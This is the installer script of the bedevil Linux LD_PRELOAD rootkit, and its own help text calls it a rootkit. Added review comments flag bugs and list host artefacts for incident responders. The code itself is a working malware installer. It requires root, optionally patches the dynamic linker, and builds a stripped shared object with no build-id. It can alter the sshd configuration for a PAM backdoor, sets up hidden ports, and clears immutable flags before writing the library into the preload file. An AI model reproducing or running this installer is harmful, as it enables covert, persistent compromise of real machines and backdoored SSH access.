bedevil.sh
#!/bin/bash
# Entry script. Prints a banner, then loads every helper library from ./etc.
# All paths below are relative, so the script only works when started from
# the repository root.
#
# Banner: shown only when stdin is a terminal and a .ascii file exists.
# NOTE(review): the contents of .ascii are spliced into the printf *format*
# string, so any '%' or backslash sequence in that file is interpreted by printf.
tty -s && clear && [ -f .ascii ] && \
printf "\e[1m\e[31m`cat .ascii`\e[0m\n"
# functions for generating random values; see the script itself for details.
source ./etc/random.sh
# miscellaneous helper functions; see the script itself for details.
source ./etc/util.sh
# default values for the variables the rest of the setup relies on.
source ./etc/defaults.sh
# mainly functions for use with dialog.
# 'show_yesno' checks whether dialog is available/wanted and shows the
# matching kind of input prompt.
source ./etc/dialog.sh
# handles reading & writing of 'toggles.h'.
source ./etc/toggles.sh
# functions for fetching the header directories & paths
# that includes.h pulls in.
source ./etc/headers.sh
# functions responsible for locating & writing
# arrays within the include directories.
source ./etc/arrays.sh
# the functions within this script set up the ports & port ranges
# that are to be hidden, before writing them to a destination.
source ./etc/hideports.sh
# functions that find & write the build settings. the author notes
# that the current approach is nowhere near efficient enough
# (i.e. it is slow).
source ./etc/settings.sh
# post-installation steps; see the script itself for details.
source ./etc/postinstall.sh
# compile_bdvl: build the shared object from $NEW_MDIR/bedevil.c with gcc,
# once for the native platform ($BDVLSO.$PLATFORM) and once with -m32
# ($BDVLSO.i686), then strip both outputs.
# Globals:  NEW_MDIR, BDVLSO, VERBOSE (read); PLATFORM (read, and rewritten
#           to v7l / v6l for armv7l / armv6l). All are set outside this file.
# Exits the whole script when $NEW_MDIR is missing or when the native object
# cannot be stripped; a failed 32-bit build only produces a warning.
# NOTE(review): for anyone analysing a recovered sample, the flags below mean
# the object carries no GNU build-id note (--build-id=none) and no debug
# info (-g0), and strip removes the non-dynamic symbols, so none of those can
# be relied on to identify or match a build.
compile_bdvl(){
# bail out early when the generated include directory is absent.
# NOTE(review): the bare 'exit' returns the status of the preceding command,
# so a caller probably sees success here; confirm against eecho.
[ ! -d "$NEW_MDIR" ] && { \
eecho "'$NEW_MDIR' does not exist. Have you populated your new headers?"; \
exit; \
}
# gcc arguments are kept in arrays and joined into one string further down.
local warning_flags optimization_flags \
options linker_options linker_flags
warning_flags=(-Wall)
optimization_flags=(-O0 -g0)
options=(-fomit-frame-pointer -fPIC)
linker_options=(-Wl,--build-id=none)
linker_flags=(-ldl)
# link libcrypt / libssl only when the matching toggle prints "true".
# NOTE(review): the substitutions are unquoted, so if toggle_enabled prints
# nothing '[' reports a syntax error and the library is silently left out.
[ `toggle_enabled USE_CRYPT` == "true" ] && linker_flags+=(-lcrypt)
[ `toggle_enabled ACCEPT_USE_SSL` == "true" ] && linker_flags+=(-lssl)
# shorten the ARM platform names used as the output file suffix.
[ $PLATFORM == "armv7l" ] && PLATFORM="v7l"
[ $PLATFORM == "armv6l" ] && PLATFORM="v6l"
# the two gcc command lines, built as flat strings and word-split when run;
# a NEW_MDIR or BDVLSO value containing whitespace would break them.
local compile_reg="gcc -std=gnu99 ${optimization_flags[*]} $NEW_MDIR/bedevil.c ${warning_flags[*]} ${options[*]} \
-I$NEW_MDIR -shared ${linker_flags[*]} ${linker_options[*]} -o $BDVLSO.$PLATFORM"
local compile_m32="gcc -m32 -std=gnu99 ${optimization_flags[*]} $NEW_MDIR/bedevil.c ${warning_flags[*]} ${options[*]} \
-I$NEW_MDIR -shared ${linker_flags[*]} ${linker_options[*]} -o $BDVLSO.i686"
# only show gcc output if we want to output verbosely.
# NOTE(review): the command runs inside backticks, so anything gcc wrote to
# stdout would then be executed as a command; the gcc exit status is not
# checked, the strip call below is what detects a failed build.
[ $VERBOSE == 1 ] && `$compile_reg`
[ $VERBOSE == 0 ] && `$compile_reg &>/dev/null`
# a native object that cannot be stripped (e.g. because it was never
# produced) aborts the script.
strip $BDVLSO.$PLATFORM 2>/dev/null || { eecho "Couldn't strip $BDVLSO.$PLATFORM, exiting"; exit; }
# lib_size is defined elsewhere; presumably reports the size of the object.
secho "`lib_size $PLATFORM`"
# the 32-bit build is best-effort: failure is reported but tolerated.
[ $VERBOSE == 1 ] && `$compile_m32`
[ $VERBOSE == 0 ] && `$compile_m32 &>/dev/null`
strip $BDVLSO.i686 2>/dev/null || wecho "Couldn't strip $BDVLSO.i686, this is ok"
[ -f $BDVLSO.i686 ] && secho "`lib_size i686`"
}
# install_bdvl: the full installation path (option -i). Requires root.
# Steps, in order: optionally patch the dynamic linker libraries, run
# setup_configuration, compile, copy the shared object(s) into $INSTALL_DIR,
# optionally call patch_sshdconfig, call setup_home, write $SOPATH into the
# file named by $LDSO_PRELOAD, then call cleanup_bdvl.
# Globals:  INSTALL_DIR, BDVLSO, PLATFORM, SOPATH (read);
#           LDSO_PRELOAD (read, replaced when the linker is patched).
# NOTE(review): host artefacts visible in this function that a responder can
# check for:
#   - a preload file (path held in $LDSO_PRELOAD; its default is defined
#     outside this file) whose content is a library path, and whose
#     immutable / append-only attributes are cleared before the write;
#   - dynamic linker libraries modified on disk when the patch step is
#     accepted; this should show up in package file verification or a
#     file-integrity baseline (the patching itself is in etc/patch_libdl.sh,
#     which is not shown here);
#   - an sshd configuration change when USE_PAM_BD is enabled (made by
#     patch_sshdconfig, defined elsewhere).
install_bdvl(){
# refuse to run unless the effective uid is 0.
[ `id -u` != 0 ] && { \
eecho "Not root. Cannot continue..." && \
exit; \
}
secho "Starting full installation!\n"
wecho "All essential dependencies must be present!"
wecho "You can install them with '$0 -D' before continuing\n"
# the linker patch step is only offered when xxd can be located.
if [ -f "`bin_path xxd`" ]; then
# a response of 0 is treated as "yes" by the check below.
local response="$(show_yesno "Patch dynamic linker libs?")"
if [ $response == 0 ]; then
necho "Patching dynamic linker libraries, please wait..."
# the last line printed by patch_libdl.sh is taken as the new value.
LDSO_PRELOAD="`etc/patch_libdl.sh -op | tail -n 1`" # change default LDSO_PRELOAD to new
# preload file location.
secho "Finished patching dynamic linker"
fi; echo
else
eecho "Cannot patch the dynamic linker as xxd was not found."
eecho "Did you install your dependencies?? :^) ('$0 -D')"
eecho "Do this, then try again."
wecho "Press enter if you would like to continue anyway..."
# block until the operator presses enter; the input itself is discarded.
read
fi
# get installation specific settings & compile the shared object
setup_configuration
compile_bdvl
# after compilation, copy the shared object(s) to the install dir.
# NOTE(review): nothing here checks that compile_bdvl succeeded beyond the
# per-file -f tests below.
echo && necho "Installing to \$INSTALL_DIR ($INSTALL_DIR)"
[ ! -d $INSTALL_DIR ] && mkdir -p $INSTALL_DIR/
[ -f $BDVLSO.$PLATFORM ] && cp $BDVLSO.$PLATFORM $INSTALL_DIR/$BDVLSO.$PLATFORM
[ -f $BDVLSO.i686 ] && cp $BDVLSO.i686 $INSTALL_DIR/$BDVLSO.i686
# sshd's configuration is only touched when the USE_PAM_BD toggle is enabled.
[ "`toggle_enabled USE_PAM_BD`" == "true" ] && \
patch_sshdconfig
# set up the installation directory before setting up the preload file.
setup_home $INSTALL_DIR
# once the object is in its directory and anything that depends on it is
# enabled, the preload file is written, which makes every new process
# load the object from then on.
necho "Writing \$SOPATH to \$LDSO_PRELOAD"
# clear the immutable and append-only attributes of an existing preload file
# so that the write below can succeed; errors are discarded.
[ -f "$LDSO_PRELOAD" ] && chattr -ia $LDSO_PRELOAD &>/dev/null
# overwrite the preload file with the library path, without a trailing newline.
echo -n "$SOPATH" > $LDSO_PRELOAD
secho "Installation complete!"
cleanup_bdvl
}
# option defaults; each one is switched to 1 by the matching flag in the
# getopts loop below (-v, -u, -z).
VERBOSE=0
USE_DIALOG=0
DOCOMPRESS=0
# help text printed for -h, for an unrecognised option, and when the script
# is started without any option.
USAGE="
Usage: $0 [option(s)]
Options:
-h: Show this help message & exit.
-v: Output verbosely.
-e: Do an environment check. (RECOMMENDED)
-u: Enable use of 'dialog' throughout setup.
-t: Go through & switch rootkit toggles.
-C: Clean up installation/compilation mess.
-d: Configure rootkit headers & settings.
-z: After configuration has finished, compress the resulting
new include directory with gzip.
-c: Compile rootkit in current directory & exit.
-D: Install all potential required dependencies. (REQUIRES ROOT)
-i: Launch full installation of bedevil. (REQUIRES ROOT)
"
# Option dispatch. Options are acted on in the order given on the command
# line, so a flag that only sets state (-v, -u, -z) has to come before the
# action that reads it (-c, -t, -d).
while getopts "hvuetCzdcDi?" opt; do
case "$opt" in
h)
echo "$USAGE"
exit
;;
v)
secho "Outputting verbosely"
VERBOSE=1
;;
u)
# enable dialog prompts when the dialog binary can be found.
# NOTE(review): if bin_path prints nothing for a missing binary, the
# unquoted test collapses to '[ ! -f ]', which is false, so USE_DIALOG is
# still set to 1; it is also set when eecho returns non-zero.
[ ! -f `bin_path dialog` ] && \
eecho "Could not find dialog..." || USE_DIALOG=1
;;
e)
# environment check, run as a separate script by relative path.
etc/environ.sh
;;
t)
# NOTE(review): 'a && b || c' form; set_toggles also runs when
# dialog_set_toggles returns non-zero.
[ $USE_DIALOG == 1 ] && \
dialog_set_toggles || set_toggles
;;
z)
necho "Going to compress $NEW_MDIR once it is created"
DOCOMPRESS=1
;;
d)
setup_configuration
;;
c)
# NOTE(review): the usage text says "& exit", but this arm does not exit;
# any options after -c are still processed.
compile_bdvl
;;
C)
cleanup_bdvl
;;
i)
install_bdvl
exit
;;
D)
# dependency installer, run as a separate script by relative path.
etc/install_deps.sh
;;
# unquoted '?' is a glob that matches any single character, so this arm is
# the catch-all for unrecognised options as well as a literal -?.
?)
echo "$USAGE"
exit
;;
esac
done
# print the usage text when getopts consumed nothing (OPTIND still 1) or when
# the first argument does not start with '-'.
[ $OPTIND == 1 ] || [[ $1 != "-"* ]] && echo "$USAGE"